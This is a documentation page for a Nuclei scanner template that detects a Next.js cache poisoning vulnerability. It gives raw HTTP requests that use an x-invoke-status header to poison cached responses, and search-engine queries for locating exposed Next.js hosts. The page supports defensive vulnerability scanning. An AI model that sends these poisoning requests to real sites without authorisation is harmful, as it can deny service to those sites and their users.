Skip to content
Nuclei Templates

Next.js Cache Poisoning

ID: next-js-cache-poisoning

Severity: high

Author: Ice3man543

Tags: cve,cve2023,next-js,cache

Description

Section titled “Description”

Next.js is vulnerable to cache poisoning through the x-middleware-prefetch and x-invoke-status headers. This can result in DoS by serving an empty JSON object or error page instead of the intended content, affecting SSR responses.

YAML Source

Section titled “YAML Source”
id: next-js-cache-poisoning


info:
  name: Next.js Cache Poisoning
  author: Ice3man543
  severity: high
  description: |
    Next.js is vulnerable to cache poisoning through the x-middleware-prefetch and x-invoke-status headers. This can result in DoS by serving an empty JSON object or error page instead of the intended content, affecting SSR responses.
  reference:
    - https://github.com/vercel/next.js/compare/v13.4.20-canary.12...v13.4.20-canary.13
    - https://github.com/valentin-panov/nextjs-no-cache-issue
    - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole
  metadata:
    vendor: vercel
    product: next.js
    framework: node.js
    shodan-query:
      - http.html:"/_next/static"
      - cpe:"cpe:2.3:a:zeit:next.js"
    fofa-query: body="/_next/static"
    zoomeye-query: app="Next.js"
  tags: cve,cve2023,next-js,cache


variables:
  rand: "{{rand_text_numeric(5)}}"


http:
  - raw:
      - |
        GET /?cb={{rand}} HTTP/1.1
        Host: {{Hostname}}
        Priority: u=1
        x-invoke-status: 888


      - |
        GET /?cb={{rand}} HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 888 && contains(body_1, '/_error')"
          - "status_code_2 == 888 && contains(body_2, '/_error')"
        condition: and
# digest: 4a0a0047304502210083e59445d18f94a4c4bee239f6342fb9a9671f88cfe1ad94ef019b187a19577502202df061ee030778e2ad14840fe0543e608ad8224cfb3f1388cbaafcee1c09850d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/nextjs/next-js-cache-poisoning.yaml"

View on Github